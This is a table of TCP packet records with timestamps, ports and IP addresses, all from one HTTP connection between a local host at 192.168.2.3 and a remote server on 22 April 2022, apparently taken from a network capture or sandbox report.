Apr 22, 2022 15:33:00.474709988 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.474773884 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.475158930 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.475203991 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.475218058 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.475234985 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.475236893 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.475296974 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.475373030 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.475421906 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.475424051 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.475438118 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.475454092 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.475472927 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.475490093 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.475501060 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.475502014 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.475527048 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.475655079 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.475672960 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.475683928 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.475699902 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.475735903 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.498369932 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.498492002 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.514916897 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.514945984 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.514959097 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.514976025 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.515047073 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.515074015 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.515271902 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.515290022 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.515302896 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.515333891 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.515341043 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.515392065 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.515813112 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.515831947 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.515846014 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.515861988 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.515872955 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.515880108 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.515892029 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.515913010 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.515959978 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.516145945 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.516165018 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.516176939 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.516189098 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.516222954 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.516290903 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.516330957 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.516339064 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.516350985 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.516380072 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.516530991 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.516576052 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.522248030 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.522478104 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.555531025 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.555557966 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.555571079 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.555589914 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.555602074 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.555663109 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.555680990 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.555680990 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.555696011 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.555713892 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.555733919 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.555759907 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.556238890 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.556257963 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.556268930 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.556286097 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.556303978 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.556305885 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.556317091 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.556335926 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.556339979 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.556353092 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.556365013 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.556394100 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.556421995 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.556644917 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.556663036 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.556674957 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.556691885 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.556698084 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.556725025 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.556751966 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.579664946 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.579792976 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.595870018 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.595897913 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.595910072 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.595930099 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.595999002 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.596081018 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.596244097 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.596273899 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.596287012 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.596293926 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.596303940 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.596309900 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.596350908 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.596702099 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.596719027 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.596733093 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.596750021 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.596754074 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.596795082 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.596801996 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.596815109 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.596838951 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.596918106 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.596951008 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.596961975 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.596963882 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.596992970 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.597229004 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.597280979 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.597304106 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.597317934 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.597356081 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.597392082 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.597438097 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.603801012 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.603871107 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.636317015 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.636367083 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.636388063 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.636457920 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.636461020 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.636483908 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.636492968 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.636507988 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.636524916 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.636543036 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.636554003 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.636569023 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.636575937 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.636595964 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.636604071 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.636646986 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.636838913 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.636868000 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.636888027 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.636904001 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.636917114 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.636949062 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.636981010 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.637295961 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.637339115 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.637367010 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.637397051 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.637403965 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.637435913 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.637444019 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.637449980 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.637470961 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.637490988 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.637610912 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.637662888 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.637684107 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.637712955 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.637729883 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.638267994 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.638304949 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:00.638354063 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.638372898 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.692984104 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:00.716757059 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.072814941 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.072858095 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.072875023 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.072899103 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.072921991 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.072937965 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.072942972 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.072958946 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.072973013 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.072982073 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.072998047 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.073029041 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.073124886 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.073147058 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.073162079 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.073178053 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.073203087 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.073368073 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.073385000 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.073420048 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.073457003 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.113591909 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.113703012 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.113758087 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.113801956 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.113821983 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.113842964 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.113879919 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.113882065 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.113930941 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.113944054 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.113997936 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.114007950 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.114059925 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.114059925 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.114121914 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.114196062 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.114221096 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.114276886 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.114278078 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.114339113 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.114392996 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.114408970 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.114469051 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.114470005 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.114531994 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.114583015 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.114594936 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.114645004 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.114646912 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.114707947 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.114762068 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.114763975 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.114814043 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.154377937 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.154438019 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.154467106 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.154501915 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.154526949 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.154566050 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.154669046 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.154700041 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.154741049 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.154759884 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.154767990 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.154788971 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.154814005 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.154818058 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.154836893 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.154850006 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.154896021 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.155360937 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.155397892 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.155416012 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.155438900 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.155455112 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.155488968 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.155525923 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.155528069 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.155546904 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.155574083 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.155698061 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.155720949 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.155746937 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.155778885 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.195228100 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.195275068 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.195293903 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.195317984 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.195341110 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.195343018 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.195360899 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.195394993 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.195451021 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.195535898 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.195563078 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.195579052 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.195601940 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.195626974 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.195643902 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.195653915 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.195712090 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.195888042 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
